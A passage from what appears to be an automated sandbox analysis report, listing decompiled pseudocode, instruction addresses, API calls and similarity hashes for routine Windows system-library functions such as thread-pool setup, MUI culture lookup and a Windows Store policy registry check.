                                                                                                                            0x6b1ff982
                                                                                                                            0x6b1ff985
                                                                                                                            0x6b1ff987
                                                                                                                            0x6b1ff987
                                                                                                                            0x6b1ff987
                                                                                                                            0x00000000
                                                                                                                            0x6b1ff987
                                                                                                                            0x6b1ff9be
                                                                                                                            0x6b1ff9c6
                                                                                                                            0x6b1ff9cb
                                                                                                                            0x6b1ff9cb
                                                                                                                            0x6b1ff9cd
                                                                                                                            0x6b1ff9cf
                                                                                                                            0x6b1ff9d2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1ff9d4
                                                                                                                            0x6b1ff930
                                                                                                                            0x6b1ff935
                                                                                                                            0x6b1ff937
                                                                                                                            0x6b2447a3
                                                                                                                            0x6b1ff93d
                                                                                                                            0x6b1ff942
                                                                                                                            0x6b1ff94a
                                                                                                                            0x6b1ff94c
                                                                                                                            0x6b1ff94e
                                                                                                                            0x6b1ff94e
                                                                                                                            0x6b1ff954
                                                                                                                            0x6b1ff95e
                                                                                                                            0x6b1ff961
                                                                                                                            0x6b1ff966
                                                                                                                            0x6b1ff968
                                                                                                                            0x6b1ff96a
                                                                                                                            0x6b1ff96a
                                                                                                                            0x6b1ff970
                                                                                                                            0x6b1ff970
                                                                                                                            0x6b1ff975
                                                                                                                            0x6b1ff97a
                                                                                                                            0x6b1ff97c
                                                                                                                            0x6b2447b1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1ff97c
                                                                                                                            0x6b1ff8b6
                                                                                                                            0x6b1ff8bb
                                                                                                                            0x6b1ff8c0
                                                                                                                            0x6b1ff8c8
                                                                                                                            0x6b1ff8ca
                                                                                                                            0x6b1ff8cf
                                                                                                                            0x6b1ff8d1
                                                                                                                            0x6b1ff8d1
                                                                                                                            0x6b1ff8d5
                                                                                                                            0x6b1ff8dc
                                                                                                                            0x6b1ff8e5
                                                                                                                            0x00000000
                                                                                                                            0x6b1ff8e7
                                                                                                                            0x6b1ff8e7
                                                                                                                            0x00000000
                                                                                                                            0x6b1ff8e7
                                                                                                                            0x6b1ff8e5

                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockShared.1105(?,?,?,?,6B2AFEB8,0000001C,6B1D2C4C,?), ref: 6B1FF8BB
                                                                                                                            • TpAllocPool.1105(00000000,00000000,?,?,?,6B2AFEB8,0000001C,6B1D2C4C,?), ref: 6B1FF8FB
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,00000000,00000000,?,?,?,6B2AFEB8,0000001C,6B1D2C4C,?), ref: 6B1FF90E
                                                                                                                            • TpSetPoolMaxThreads.1105(00000000,7FFE03C0,?,00000000,00000000,?,?,?,6B2AFEB8,0000001C,6B1D2C4C,?), ref: 6B1FF954
                                                                                                                            • TpSetPoolMaxThreadsSoftLimit.1105(00000000,7FFE03C0,00000000,7FFE03C0,?,00000000,00000000,?,?,?,6B2AFEB8,0000001C,6B1D2C4C,?), ref: 6B1FF970
                                                                                                                            • TpSetPoolMaxThreads.1105(00000000,00000001,?,00000000,00000000,?,?,?,6B2AFEB8,0000001C,6B1D2C4C,?), ref: 6B1FF9BE
                                                                                                                            • TpSetPoolMinThreads.1105(00000000,00000001,00000000,00000001,?,00000000,00000000,?,?,?,6B2AFEB8,0000001C,6B1D2C4C,?), ref: 6B1FF9C6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Pool$Threads$AcquireLock$AllocExclusiveLimitSharedSoft
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4196657934-0
                                                                                                                            • Opcode ID: 964c386b563b1a7e9c1e83423db33f6dc5a6626b4070cf1530d79961a49ca76d
                                                                                                                            • Instruction ID: fb4063602fc9d0333b1e1c09477b9061e91f924331167935975ba4f803c183a1
                                                                                                                            • Opcode Fuzzy Hash: 964c386b563b1a7e9c1e83423db33f6dc5a6626b4070cf1530d79961a49ca76d
                                                                                                                            • Instruction Fuzzy Hash: 18417F71A02209BBEB118FB8C890B9EB7F9FF49715F20015AE560E7291DBBC8942C751
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D5210, Relevance: 15.1, APIs: 10, Instructions: 107memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E6B1D5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				void* _t35;
				int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E6B1D52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *(_t31 + 0x28);
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *(_t61 + 0x10);
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E6B2195D0();
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t61);
						}
					} else {
						E6B1EEB70(_t54, 0x6b2c79a0);
					}
					return _t52 + 2;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E6B2195D0();
								RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t61);
							}
						} else {
							E6B1EEB70(_t54, 0x6b2c79a0);
						}
						return _t52;
					}
					L5:
					_t33 = memcpy(_a8, _t54, _t52);
					if(_t61 == 0) {
						E6B1EEB70(_t54, 0x6b2c79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E6B2195D0();
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t35 + _t52)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                                            0x6b1d5220
                                                                                                                            0x6b1d5224
                                                                                                                            0x6b230d13
                                                                                                                            0x6b230d16
                                                                                                                            0x6b230d19
                                                                                                                            0x6b1d522a
                                                                                                                            0x6b1d522a
                                                                                                                            0x6b1d522d
                                                                                                                            0x6b1d522d
                                                                                                                            0x6b1d5231
                                                                                                                            0x6b1d5235
                                                                                                                            0x6b1d5239
                                                                                                                            0x6b230d5c
                                                                                                                            0x6b230d62
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b230d6a
                                                                                                                            0x6b230d7b
                                                                                                                            0x6b230d7f
                                                                                                                            0x6b230d81
                                                                                                                            0x6b230d84
                                                                                                                            0x6b230d95
                                                                                                                            0x6b230d95
                                                                                                                            0x6b230d6c
                                                                                                                            0x6b230d71
                                                                                                                            0x6b230d71
                                                                                                                            0x00000000
                                                                                                                            0x6b1d524a
                                                                                                                            0x6b1d524a
                                                                                                                            0x6b1d5250
                                                                                                                            0x6b230d24
                                                                                                                            0x6b230d35
                                                                                                                            0x6b230d39
                                                                                                                            0x6b230d3b
                                                                                                                            0x6b230d3e
                                                                                                                            0x6b230d50
                                                                                                                            0x6b230d50
                                                                                                                            0x6b230d26
                                                                                                                            0x6b230d2b
                                                                                                                            0x6b230d2b
                                                                                                                            0x00000000
                                                                                                                            0x6b230d55
                                                                                                                            0x6b1d5256
                                                                                                                            0x6b1d525b
                                                                                                                            0x6b1d5265
                                                                                                                            0x6b230da7
                                                                                                                            0x6b1d526b
                                                                                                                            0x6b1d526e
                                                                                                                            0x6b1d5272
                                                                                                                            0x6b230db1
                                                                                                                            0x6b230db4
                                                                                                                            0x6b230dc5
                                                                                                                            0x6b230dc5
                                                                                                                            0x6b1d5272
                                                                                                                            0x6b1d5278
                                                                                                                            0x6b1d527e
                                                                                                                            0x6b1d528a
                                                                                                                            0x6b1d528c
                                                                                                                            0x6b1d528d
                                                                                                                            0x00000000
                                                                                                                            0x6b1d5280
                                                                                                                            0x6b1d5282
                                                                                                                            0x6b1d5288
                                                                                                                            0x6b1d529f
                                                                                                                            0x6b1d5292
                                                                                                                            0x00000000
                                                                                                                            0x6b1d5292
                                                                                                                            0x00000000
                                                                                                                            0x6b1d5288
                                                                                                                            0x6b1d527e

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B1D52A5: RtlEnterCriticalSection.1105(6B2C79A0,?,00000000,?), ref: 6B1D52BF
                                                                                                                              • Part of subcall function 6B1D52A5: RtlLeaveCriticalSection.1105(6B2C79A0,6B2C79A0,?,00000000,?), ref: 6B1D52DD
                                                                                                                            • memcpy.1105(?,?), ref: 6B1D525B
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C79A0), ref: 6B230D2B
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C79A0), ref: 6B230D71
                                                                                                                            • ZwClose.1105(?), ref: 6B230D84
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?), ref: 6B230D95
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C79A0), ref: 6B230DA7
                                                                                                                            • ZwClose.1105(?), ref: 6B230DB4
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?), ref: 6B230DC5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$CloseFreeHeap$Entermemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3163955863-0
                                                                                                                            • Opcode ID: 21468c1356f901bd20b1290f996c08f08279244b9ed1e5e7c6a3d95a6db2ac7c
                                                                                                                            • Instruction ID: ceec2532f36ccafae6594b9a73a6c18703e6db34bd12f4af5b87f1ed569f31e4
                                                                                                                            • Opcode Fuzzy Hash: 21468c1356f901bd20b1290f996c08f08279244b9ed1e5e7c6a3d95a6db2ac7c
                                                                                                                            • Instruction Fuzzy Hash: 3C311431591A19FBC7228B28C8C1F5777F5FF00B65F11461AE5158B1E0DB28F905CAA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28DF1D, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 166memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E6B28DF1D(char __ecx, void* __edx, intOrPtr _a4, short _a8) {
				WCHAR* _v5;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _t60;
				signed int _t62;
				signed int _t65;
				struct _EXCEPTION_RECORD _t67;
				signed int _t70;
				WCHAR* _t73;
				WCHAR* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t84;
				WCHAR* _t88;
				WCHAR* _t92;
				intOrPtr _t94;
				signed int _t99;
				signed int _t101;
				signed int _t103;
				signed int _t107;
				void* _t108;
				WCHAR* _t110;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t114;
				void* _t115;
				void* _t118;

				_t60 = _a4;
				_t92 = 0;
				_v12 = __ecx;
				_t115 = 0;
				if(_t60 != 1) {
					__eflags = _t60 - 3;
					if(_t60 != 3) {
						__eflags = _t60 - 2;
						if(_t60 != 2) {
							L39:
							__eflags = 0;
							return 0;
						}
						_t62 = _a8;
						__eflags = _t62;
						if(_t62 < 0) {
							goto L39;
						}
						_t94 =  *((intOrPtr*)(__ecx + 0x14));
						_t107 = _t62;
						__eflags = _t107 - ( *(_t94 + 6) & 0x0000ffff);
						if(_t107 >= ( *(_t94 + 6) & 0x0000ffff)) {
							goto L39;
						}
						_t65 = _t107 * 0x1c +  *((intOrPtr*)(_t94 + 0xc));
						__eflags = __edx - _t65;
						L3:
						return _t65 & 0xffffff00 | _t118 == 0x00000000;
					}
					_t67 =  *(__edx + 6) & 0x0000ffff;
					_v16 = 0;
					__eflags = _t67;
					if(_t67 < 0) {
						__eflags =  *(__edx + 4);
						if( *(__edx + 4) == 0) {
							goto L39;
						}
						_t108 = 0x55;
						_t115 = E6B1DF358(__ecx, _t108);
						__eflags = _t115;
						if(_t115 == 0) {
							goto L39;
						}
						_v16 = _t115;
						_v20 = 0xaa0000;
						_t70 = E6B1E3B30( *(__edx + 4) & 0x0000ffff,  &_v20);
						L25:
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = _t115;
							if(_t115 != 0) {
								RtlFreeHeap( *( *[fs:0x30] + 0x18), _t92, _t115);
							}
							goto L39;
						}
						_t110 =  *(_v12 + 0x18);
						__eflags = _t110;
						if(_t110 == 0) {
							L30:
							_t73 = _t92;
							L31:
							__eflags = _t73;
							if(_t73 == 0) {
								L33:
								_v5 = _t92;
								L34:
								__eflags = _t115;
								if(_t115 != 0) {
									RtlFreeHeap( *( *[fs:0x30] + 0x18), _t92, _t115);
								}
								return _v5;
							}
							_t76 = E6B21E490(_v16, _t73);
							_v5 = 1;
							__eflags = _t76;
							if(_t76 == 0) {
								goto L34;
							}
							goto L33;
						}
						_t77 = _a8;
						__eflags = _t77;
						if(_t77 < 0) {
							goto L30;
						}
						_t99 = _t77;
						__eflags = _t99 - (_t110[3] & 0x0000ffff);
						if(_t99 >= (_t110[3] & 0x0000ffff)) {
							goto L30;
						}
						_t73 = _t110[8] +  *(_t110[6] + _t99 * 2) * 2;
						goto L31;
					}
					__eflags = _t67 - _a8;
					if(_t67 != _a8) {
						_t111 =  *(__ecx + 0x18);
						__eflags = _t111;
						if(_t111 == 0) {
							L18:
							_t114 = _t92;
							L19:
							__eflags = _t114;
							if(__eflags != 0) {
								_t67 =  &_v20;
								RtlInitUnicodeString(_t67, _t114);
								__eflags = _t114;
							}
							_t70 = _t67 & 0xffffff00 | __eflags != 0x00000000;
							goto L25;
						}
						_t101 = _t67;
						_t67 = _t111[3] & 0x0000ffff;
						__eflags = _t101 - _t67;
						if(_t101 >= _t67) {
							goto L18;
						}
						_t67 = _t111[8];
						_t114 = _t67 +  *(_t111[6] + _t101 * 2) * 2;
						goto L19;
					}
					return 1;
				}
				_t83 =  *(__edx + 4) & 0x0000ffff;
				if(_t83 == 0) {
					_t84 =  *(__edx + 6) & 0x0000ffff;
					__eflags = _t84;
					if(_t84 < 0) {
						goto L39;
					}
					_t112 =  *(__ecx + 0x18);
					__eflags = _t112;
					if(_t112 != 0) {
						_t103 = _t84;
						__eflags = _t103 - (_t112[3] & 0x0000ffff);
						if(_t103 < (_t112[3] & 0x0000ffff)) {
							_t92 = _t112[8] +  *(_t112[6] + _t103 * 2) * 2;
						}
					}
					__eflags = _t92;
					if(_t92 == 0) {
						goto L39;
					} else {
						RtlInitUnicodeString( &_v20, _t92);
						_t88 = E6B1E43C0( &_v20,  &_v12);
						__eflags = _t88;
						if(_t88 == 0) {
							goto L39;
						}
						_t65 = _v12;
						__eflags = _t65 - _a8;
						goto L3;
					}
				} else {
					_t65 = _a8;
					_t118 = _t83 - _t65;
					goto L3;
				}
			}































                                                                                                                            0x6b28df25
                                                                                                                            0x6b28df2a
                                                                                                                            0x6b28df2c
                                                                                                                            0x6b28df2f
                                                                                                                            0x6b28df36
                                                                                                                            0x6b28dfae
                                                                                                                            0x6b28dfb0
                                                                                                                            0x6b28e0c1
                                                                                                                            0x6b28e0c3
                                                                                                                            0x6b28e0b6
                                                                                                                            0x6b28e0b6
                                                                                                                            0x00000000
                                                                                                                            0x6b28e0b6
                                                                                                                            0x6b28e0c5
                                                                                                                            0x6b28e0c9
                                                                                                                            0x6b28e0cc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28e0ce
                                                                                                                            0x6b28e0d1
                                                                                                                            0x6b28e0d8
                                                                                                                            0x6b28e0da
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28e0df
                                                                                                                            0x6b28e0e2
                                                                                                                            0x6b28df49
                                                                                                                            0x00000000
                                                                                                                            0x6b28df49
                                                                                                                            0x6b28dfb6
                                                                                                                            0x6b28dfba
                                                                                                                            0x6b28dfbd
                                                                                                                            0x6b28dfc0
                                                                                                                            0x6b28e007
                                                                                                                            0x6b28e00b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28e013
                                                                                                                            0x6b28e019
                                                                                                                            0x6b28e01b
                                                                                                                            0x6b28e01d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28e02c
                                                                                                                            0x6b28e02f
                                                                                                                            0x6b28e036
                                                                                                                            0x6b28e03b
                                                                                                                            0x6b28e03b
                                                                                                                            0x6b28e03d
                                                                                                                            0x6b28e0a2
                                                                                                                            0x6b28e0a4
                                                                                                                            0x6b28e0b1
                                                                                                                            0x6b28e0b1
                                                                                                                            0x00000000
                                                                                                                            0x6b28e0a4
                                                                                                                            0x6b28e042
                                                                                                                            0x6b28e045
                                                                                                                            0x6b28e047
                                                                                                                            0x6b28e06c
                                                                                                                            0x6b28e06c
                                                                                                                            0x6b28e06e
                                                                                                                            0x6b28e06e
                                                                                                                            0x6b28e070
                                                                                                                            0x6b28e085
                                                                                                                            0x6b28e085
                                                                                                                            0x6b28e088
                                                                                                                            0x6b28e088
                                                                                                                            0x6b28e08a
                                                                                                                            0x6b28e098
                                                                                                                            0x6b28e098
                                                                                                                            0x00000000
                                                                                                                            0x6b28e09d
                                                                                                                            0x6b28e076
                                                                                                                            0x6b28e07b
                                                                                                                            0x6b28e081
                                                                                                                            0x6b28e083
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28e083
                                                                                                                            0x6b28e049
                                                                                                                            0x6b28e04d
                                                                                                                            0x6b28e050
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28e052
                                                                                                                            0x6b28e059
                                                                                                                            0x6b28e05b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28e067
                                                                                                                            0x00000000
                                                                                                                            0x6b28e067
                                                                                                                            0x6b28dfc2
                                                                                                                            0x6b28dfc6
                                                                                                                            0x6b28dfcf
                                                                                                                            0x6b28dfd2
                                                                                                                            0x6b28dfd4
                                                                                                                            0x6b28dff0
                                                                                                                            0x6b28dff0
                                                                                                                            0x6b28dff2
                                                                                                                            0x6b28dff2
                                                                                                                            0x6b28dff4
                                                                                                                            0x6b28dff7
                                                                                                                            0x6b28dffb
                                                                                                                            0x6b28e000
                                                                                                                            0x6b28e000
                                                                                                                            0x6b28e002
                                                                                                                            0x00000000
                                                                                                                            0x6b28e002
                                                                                                                            0x6b28dfd6
                                                                                                                            0x6b28dfd9
                                                                                                                            0x6b28dfdd
                                                                                                                            0x6b28dfdf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28dfe8
                                                                                                                            0x6b28dfeb
                                                                                                                            0x00000000
                                                                                                                            0x6b28dfeb
                                                                                                                            0x00000000
                                                                                                                            0x6b28dfc8
                                                                                                                            0x6b28df38
                                                                                                                            0x6b28df3f
                                                                                                                            0x6b28df51
                                                                                                                            0x6b28df55
                                                                                                                            0x6b28df58
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28df5e
                                                                                                                            0x6b28df61
                                                                                                                            0x6b28df63
                                                                                                                            0x6b28df65
                                                                                                                            0x6b28df6c
                                                                                                                            0x6b28df6e
                                                                                                                            0x6b28df7a
                                                                                                                            0x6b28df7a
                                                                                                                            0x6b28df6e
                                                                                                                            0x6b28df7d
                                                                                                                            0x6b28df7f
                                                                                                                            0x00000000
                                                                                                                            0x6b28df85
                                                                                                                            0x6b28df8a
                                                                                                                            0x6b28df97
                                                                                                                            0x6b28df9c
                                                                                                                            0x6b28df9e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b28dfa4
                                                                                                                            0x6b28dfa8
                                                                                                                            0x00000000
                                                                                                                            0x6b28dfa8
                                                                                                                            0x6b28df41
                                                                                                                            0x6b28df43
                                                                                                                            0x6b28df47
                                                                                                                            0x00000000
                                                                                                                            0x6b28df47

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(C000000D,00000000,C000000D,00000000,00000200,?,C000000D,00000001,00000000,?,?,00000000,00000000,6B1E71B4,6B1E71B4,?), ref: 6B28DF8A
                                                                                                                            • RtlCultureNameToLCID.1105(C000000D,00000000,C000000D,00000000,C000000D,00000000,00000200,?,C000000D,00000001,00000000,?,?,00000000,00000000,6B1E71B4), ref: 6B28DF97
                                                                                                                            • RtlInitUnicodeString.1105(C000000D,00000000,C000000D,00000000,00000200,?,C000000D,00000001,00000000,?,?,00000000,00000000,6B1E71B4,6B1E71B4,?), ref: 6B28DFFB
                                                                                                                            • RtlLCIDToCultureName.1105(?,C000000D,C000000D,00000000,00000200,?), ref: 6B28E036
                                                                                                                            • _wcsicmp.1105(00000001,00000000,?,C000000D,C000000D,00000000,00000200,?), ref: 6B28E076
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,C000000D,C000000D,00000000,00000200,?), ref: 6B28E098
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,C000000D,C000000D,00000000,00000200,?), ref: 6B28E0B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CultureFreeHeapInitNameStringUnicode$_wcsicmp
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 3044635390-1339004836
                                                                                                                            • Opcode ID: f6788a1a59de130229dde858da962be91bc58646c2a3c55cd945894b093d2725
                                                                                                                            • Instruction ID: e2d38185ccdf043a5f3af1fa8cb163ebfd4799c1cc10cf9eaffc5ae664fe050c
                                                                                                                            • Opcode Fuzzy Hash: f6788a1a59de130229dde858da962be91bc58646c2a3c55cd945894b093d2725
                                                                                                                            • Instruction Fuzzy Hash: A551E63491011E97DB14EF5884C0ABEB7F5FF40B45B40859EEC64AB2C1EB39D98AD7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20FF9C, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 100nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E6B20FF9C() {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v28;
				void* _v36;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				signed int _t35;
				signed int _t52;
				char _t57;
				void* _t68;

				_t35 =  *0x6b2c5c88; // 0x2
				_t68 = 2;
				if(_t35 == _t68) {
					_v12 = 0;
					RtlInitUnicodeString( &_v28, L"\\Registry\\Machine\\SOFTWARE\\Policies\\Microsoft\\WindowsStore");
					_v12 = 0;
					_v60 =  &_v28;
					_push( &_v68);
					_push(0x20019);
					_v68 = 0x18;
					_push( &_v12);
					_v64 = 0;
					_v56 = 0x40;
					_v52 = 0;
					_v48 = 0;
					if( *0x6b1b6cd8() >= 0) {
						_v8 = 0;
						_v16 = 4;
						RtlInitUnicodeString( &_v36, L"AutoDownload");
						if(E6B2AF1B5(_v12,  &_v36,  &_v20,  &_v8,  &_v16) < 0 || _v20 != 4 || _v8 != _t68) {
							_v8 = 0;
							_t57 = 4;
							_v16 = _t57;
							RtlInitUnicodeString( &_v44, L"DisableStoreApps");
							if(E6B2AF1B5(_v12,  &_v44,  &_v20,  &_v8,  &_v16) < 0 || _v20 != _t57) {
								goto L3;
							} else {
								if(_v8 == 1) {
									goto L9;
								}
							}
						} else {
							L9:
							asm("lock cmpxchg [edx], ecx");
						}
					} else {
						L3:
					}
					asm("lock cmpxchg [edx], esi");
				}
				_t52 =  *0x6b2c5c88; // 0x2
				return _t52 & 0xffffff00 | _t52 == 0x00000000;
			}




















                                                                                                                            0x6b20ffa1
                                                                                                                            0x6b20ffae
                                                                                                                            0x6b20ffb1
                                                                                                                            0x6b20ffcf
                                                                                                                            0x6b20ffd2
                                                                                                                            0x6b20ffdb
                                                                                                                            0x6b20ffde
                                                                                                                            0x6b20ffe4
                                                                                                                            0x6b20ffe5
                                                                                                                            0x6b20ffed
                                                                                                                            0x6b20fff4
                                                                                                                            0x6b20fff5
                                                                                                                            0x6b20fff8
                                                                                                                            0x6b20ffff
                                                                                                                            0x6b210002
                                                                                                                            0x6b210010
                                                                                                                            0x6b24c15d
                                                                                                                            0x6b24c161
                                                                                                                            0x6b24c168
                                                                                                                            0x6b24c187
                                                                                                                            0x6b24c1a8
                                                                                                                            0x6b24c1ae
                                                                                                                            0x6b24c1b5
                                                                                                                            0x6b24c1b8
                                                                                                                            0x6b24c1d7
                                                                                                                            0x00000000
                                                                                                                            0x6b24c1e6
                                                                                                                            0x6b24c1ee
                                                                                                                            0x00000000
                                                                                                                            0x6b24c1f4
                                                                                                                            0x6b24c1ee
                                                                                                                            0x6b24c194
                                                                                                                            0x6b24c199
                                                                                                                            0x6b24c19d
                                                                                                                            0x6b24c19d
                                                                                                                            0x6b210016
                                                                                                                            0x6b210016
                                                                                                                            0x6b210016
                                                                                                                            0x6b21001d
                                                                                                                            0x6b21001d
                                                                                                                            0x6b20ffb3
                                                                                                                            0x6b20ffc3

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,\Registry\Machine\SOFTWARE\Policies\Microsoft\WindowsStore,?,?,?), ref: 6B20FFD2
                                                                                                                            • ZwOpenKey.1105(?,00020019,?), ref: 6B210005
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitOpenStringUnicode
                                                                                                                            • String ID: @$AutoDownload$DisableStoreApps$\Registry\Machine\SOFTWARE\Policies\Microsoft\WindowsStore
                                                                                                                            • API String ID: 3946626324-1446860424
                                                                                                                            • Opcode ID: f35988da3178b3b971c9fba5984ed2fbabeedcf9535578c50d0afab2e8de34dc
                                                                                                                            • Instruction ID: 269425d1ee1e1a9b444402c45682b8644f8275ff9a2300b4c398f54cc31a7851
                                                                                                                            • Opcode Fuzzy Hash: f35988da3178b3b971c9fba5984ed2fbabeedcf9535578c50d0afab2e8de34dc
                                                                                                                            • Instruction Fuzzy Hash: 0431F8B1D0021DEFDB01CF99C8C4ADFBBF9FB49715F10456AE605A6240DB389A45CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B283D40, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98memorytimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E6B283D40(intOrPtr __ecx, void** __edx) {
				signed int _v8;
				void** _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t34;
				void* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
